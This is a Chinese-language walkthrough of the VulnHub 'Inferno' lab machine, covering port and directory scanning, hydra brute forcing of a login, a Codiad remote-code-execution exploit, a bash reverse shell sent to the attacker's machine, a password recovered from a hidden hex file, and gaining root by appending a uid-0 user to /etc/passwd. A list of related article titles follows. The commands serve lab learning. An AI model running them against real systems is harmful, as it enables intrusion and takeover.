目录

信息搜集

扫描网段确定真实IP地址

扫描IP地址确定开放端口以及服务

浏览器查看web站点

扫描网站目录

发现站点入口

发现漏洞

暴力破解登录页面

登录后台

getshell

搜索管理平台名找到利用脚本

最终确定49705.py为exp

提权

发现隐藏文件

​hex解密隐藏文件得到一组用户密码

ssh登录该用户并得到第一个flag

提升至root权限

查询该提权命令的利用方法

首先将要设置的密码转换为sha-512

写入root权限用户

登录root权限用户得到flag

总结

参考资料


​​​​​​​

信息搜集

扫描网段确定真实IP地址

扫描IP地址确定开放端口以及服务

nmap -A  -p- 192.168.179.168

说实话我还是第一次扫出来这么多端口,但是仔细看看好像哪里又有点不太对劲,好像大多数服务后面都跟了?号,感觉应该是误报,毕竟web和ssh是确定的

浏览器查看web站点

是什么不重要,重要的是什么都没有

扫描网站目录

顺便说一句我也不是一开始就顺利扫到这个目录,我比较习惯用dirsearch和dirb这两款扫描工具,但是很无奈这俩大哥都不好使了(一般我都是默认扫,所以加载的字典可能不够大),没办法尝试了一下gobuster还真扫出来了

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt   -x html -u http://192.168.179.168

发现站点入口

发现漏洞

暴力破解登录页面

也没有更好的办法了,只能尝试一下爆破。

hydra -L ~/Desktop/Fuzzing-Dicts-master/Webmanage-Username.txt -P /usr/share/wordlists/rockyou.txt 192.168.179.168  -f http-get /inferno/ -t 64
####
-L:指定用户名字典
-P:指定密码字典
-f:找到第一对登录名或者密码的时候中止破解
-t:指定线程数
http—get:请求方式
得到用户名:admin密码: dante1

登录后台

输入相同的账号密码,进入后台管理页面

我是几乎把这些文件都看得差不多了,也没看出什么名堂,但是右键发现可以上传文件

getshell

一开始以为可以上传反弹shell文件getshell,后来发现文件是上传了,但是却找不到去哪了,只能换个思路。这是个后台管理平台,那平台本身就可能存在漏洞。

搜索管理平台名找到利用脚本

searchsploit  codiad

本来还打算搞到版本号,搞得精确一点,奈何所有文件都翻过来也没翻到版本信息,好像是翻到了但是加密了。后来一想直接搜算了,好在搜出来的利用脚本并不多大不了挨个试嘛

最终确定49705.py为exp

locate multiple/webapps/49705.py
scp /usr/share/exploitdb/exploits/multiple/webapps/49705.py /tmp
cd /tmp
python 49705.py http://admin:dante1@192.168.179.168/inferno/ admin dante1 192.168.179.145 4444 linux

但是很奇怪,我也不知道为什么我利用这个脚本的时候一直利用不成功。后来Google到了另一个利用脚本,按理说他俩应该是一样的。但是这个就可以成功利用

git clone https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit.git
cd Codiad-Remote-Code-Execute-Exploit
chmod +x exploit.py
./exploit.py http://admin:dante1@192.168.179.168/inferno/ admin dante1 192.168.179.145 4444 linux
另起一个终端
echo 'bash -c "bash -i >/dev/tcp/192.168.179.145/4445 0>&1 2>&1"' | nc -lnvp 4444
再来一个
nc -lnvp 4445
回到最初的那个
Y

提权

发现隐藏文件

cd /home
ls -al
cd dante
ls -al
cd Downloads
ls -al
cat .download.dat

hex解密隐藏文件得到一组用户密码

c2 ab 4f 72 20 73 65 e2 80 99 20 74 75 20 71 75 65 6c 20 56 69 72 67 69 6c 69 6f 20 65 20 71 75 65 6c 6c 61 20 66 6f 6e 74 65 0a 63 68 65 20 73 70 61 6e 64 69 20 64 69 20 70 61 72 6c 61 72 20 73 c3 ac 20 6c 61 72 67 6f 20 66 69 75 6d 65 3f c2 bb 2c 0a 72 69 73 70 75 6f 73 e2 80 99 69 6f 20 6c 75 69 20 63 6f 6e 20 76 65 72 67 6f 67 6e 6f 73 61 20 66 72 6f 6e 74 65 2e 0a 0a c2 ab 4f 20 64 65 20 6c 69 20 61 6c 74 72 69 20 70 6f 65 74 69 20 6f 6e 6f 72 65 20 65 20 6c 75 6d 65 2c 0a 76 61 67 6c 69 61 6d 69 20 e2 80 99 6c 20 6c 75 6e 67 6f 20 73 74 75 64 69 6f 20 65 20 e2 80 99 6c 20 67 72 61 6e 64 65 20 61 6d 6f 72 65 0a 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 63 65 72 63 61 72 20 6c 6f 20 74 75 6f 20 76 6f 6c 75 6d 65 2e 0a 0a 54 75 20 73 65 e2 80 99 20 6c 6f 20 6d 69 6f 20 6d 61 65 73 74 72 6f 20 65 20 e2 80 99 6c 20 6d 69 6f 20 61 75 74 6f 72 65 2c 0a 74 75 20 73 65 e2 80 99 20 73 6f 6c 6f 20 63 6f 6c 75 69 20 64 61 20 63 75 e2 80 99 20 69 6f 20 74 6f 6c 73 69 0a 6c 6f 20 62 65 6c 6c 6f 20 73 74 69 6c 6f 20 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 6f 6e 6f 72 65 2e 0a 0a 56 65 64 69 20 6c 61 20 62 65 73 74 69 61 20 70 65 72 20 63 75 e2 80 99 20 69 6f 20 6d 69 20 76 6f 6c 73 69 3b 0a 61 69 75 74 61 6d 69 20 64 61 20 6c 65 69 2c 20 66 61 6d 6f 73 6f 20 73 61 67 67 69 6f 2c 0a 63 68 e2 80 99 65 6c 6c 61 20 6d 69 20 66 61 20 74 72 65 6d 61 72 20 6c 65 20 76 65 6e 65 20 65 20 69 20 70 6f 6c 73 69 c2 bb 2e 0a 0a 64 61 6e 74 65 3a 56 31 72 67 31 6c 31 30 68 33 6c 70 6d 33

hex解密后

«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».dante:V1rg1l10h3lpm3

ssh登录该用户并得到第一个flag

使用ssh是因为之前使用的那个终端不稳定老是断

提升至root权限​​​​​​​

sudo -l

查询该提权命令的利用方法

好的这样就大概了解到该命令的利用方法和作用。我们的思路现在是这样的,既然我有写的权限,那我直接在/etc/passwd下写个root权限的用户不就行了么

首先将要设置的密码转换为sha-512

mkpasswd -m sha-512
###
这边自己设置一个密码即可

写入root权限用户

LFILE=/etc/passwd
echo 'tester:$6$RJIWu8XvJ9VKaHHg$mDImrqHVFPVDckOH9Nxd0hIxBOs6heTrcmuMKEhwnl/B/yn764GBGjWDka6AcJgOzwQiTV9LBe5/Al8E3jrJi0:0:0:root:/root:/bin/bash' |sudo tee -a "$LFILE"
cat /etc/passwd

登录root权限用户得到flag

su tester
当时自己设置的密码
id
cd /root
ls -al
cat proof.txt

总结

总的来说还是有收获的比如说扫描网站目录的时候可以加载一个大点的字典或者多试试几个扫描工具可能会有意想不到的结果。然后就是./exploit.py http://admin:dante1@192.168.179.168/inferno/ admin dante1 192.168.179.145 4444 linux   这个在输入目标IP地址的时候不能单纯的输入IP地址和目录还要再前面加上admin:dante1是因为该页面有一个登录界面用于验证,这样可以帮助我们绕过该登录页面从而访问到后台管理界面。(学到了)其实还有一点搞不懂的是为什么信息藏在.download.dat里面。后来想想感觉可能跟文件本身关系也不大,应该就是隐藏文件名字而已没什么特殊含义(主要是百度谷歌都没搜出个所以然来,如果知道请告诉我,非常感谢)。最后就是又学到了一种提权方法。

参考资料

https://www.youtube.com/watch?v=oYKbbfh7ukk

https://0xjin.medium.com/inferno-1-vulnhub-details-7fd426e12e68

vulnhub:inferno-1.1相关推荐

  1. 玩转靶机Vulnhub:DC1(详细)

    靶机Vulnhub:DC1 靶机和环境准备: 主机发现: 信息收集: 发现并利用漏洞 SUID提权: 总结: 靶机和环境准备: 宿主机:kaili dc1靶机下载:DC: 1 ~ VulnHub 主机 ...

  2. React、Preact还是Inferno?哪个是用于快速应用程序的最佳JS框架

    全文共2215字,预计学习时长6分钟 图源:unsplash JavaScript中有许多框架,且各有千秋.在过去的几个月中,笔者一直在研究各种JavaScript框架及其差异.本文中,笔者将选择三个 ...

  3. narak 靶机实验实战演练

    靶机:NARAK kali : 192.168.71.128 靶机 :192.168.71.129 渗透流程: 探测靶机ip地址 命令:fping -aqg 192.168.71.0/24 2. nm ...

  4. 全!CTF靶场、渗透实战靶场总结 (适合收藏)

    CTF靶场.渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门.提升自己.丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯): 渗透实战靶场: ...

  5. No.20-基础-渗透学习

    ** 基础篇 ** 目标:通关vulnhub平台上的靶机 作者:大余 时间:2020-01-17 请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机.我将使用Kali Linux作为解 ...

  6. C语言之父 Dennis M. Ritchie

    Dennis M. Ritchie Dennis M. Ritchie 或称(Dennis; D.M.Ritchie) 其人图片链接:http://www.redhat.com/mirrors/LDP ...

  7. OSCP 2021攻略之旅--从小白到通过

    1.背景 本文提供给0基础小白,指导其如何学习通过OSCP. 本人CS硕士毕业,毕业后加入一家网络安全公司一直做传统网络安全产品研发工作(FW/IDS/IPS/WAF/scanner).现任谋厂研究员 ...

  8. Simpleperf详细使用

    一.Simpleperf介绍 Simpleperf是一个强大的命令行工具,它包含在NDK中,可以帮助我们分析应用的CPU性能.Simpleperf可以帮助我们找到应用的热点,而热点往往与性能问题相关, ...

  9. 【靶场平台】一些免费好用的靶机渗透测试环境

    1.Vulhub: (各种漏洞环境集合,一键搭建漏洞测试靶场) https://vulhub.org/(在线版) https://github.com/vulhub/vulhub(离线版) 2.Vul ...

最新文章

  1. 微信公众号开发之准备工作
  2. Codeforces Round #505 (rated, Div. 1 + Div. 2, based on VK Cup 2018 Final)
  3. Django框架连接MySQL数据库
  4. Android访问网络系列之--访问图片
  5. 思维--找规律--Codeforces Round #645 (Div. 2) c题
  6. javascript写的关于静态页面获取URL传递参数的函数[原创]
  7. hdu 2222 Keywords Search(ac自动机)
  8. Objective C 总结(十):Conventions
  9. python中常用的os模块
  10. DOM增删操作(创建删除表格)
  11. 看《烈火雄心》 --当大家从火里出来,我们进去
  12. 大数据可视化分析,主要有哪些大数据可视化工具?
  13. 过滤文本或字符串中的emoji表情(包括微信自带表情处理)
  14. Philippe Clerc先生谈法国竞争情报
  15. 创业基础(第六章:创业资源及其管理) 来自高校:全国大学生创新创业实践联盟 分类:创新创业 学习规则:按序学习
  16. 全球及中国军用海岸雷达行业研究及十四五规划分析报告
  17. DITHER 抖动算法
  18. Generalized Focal Loss
  19. 呆萌ps2显示服务器失败,呆萌PS2模拟器
  20. qq邮箱怎么添加学校邮箱

热门文章

  1. ajax鼠标悬停,mouseout后触发jQuery Ajax鼠标悬停事件
  2. 3种在JavaScript中验证电子邮件地址的方法
  3. linux gnu升级,GNU/Linux 让Ubuntu 系统版本升级
  4. java求长方形的表面积程序_Android Studio实现长方体表面积计算器
  5. 图像分割的 U-Net 系列方法
  6. 100天精通Python(基础篇)——第19天:练习题:我要买票吗
  7. 人脑是量子计算机科学实验,你的大脑可能是一台量子计算机
  8. matlab求最大公倍数_matlab求最大公约数和最小公倍数
  9. 微信IOS navigator.getUserMedia undefined
  10. 【评测】粪便基因组 DNA 提取试剂盒(柱膜法)使用报告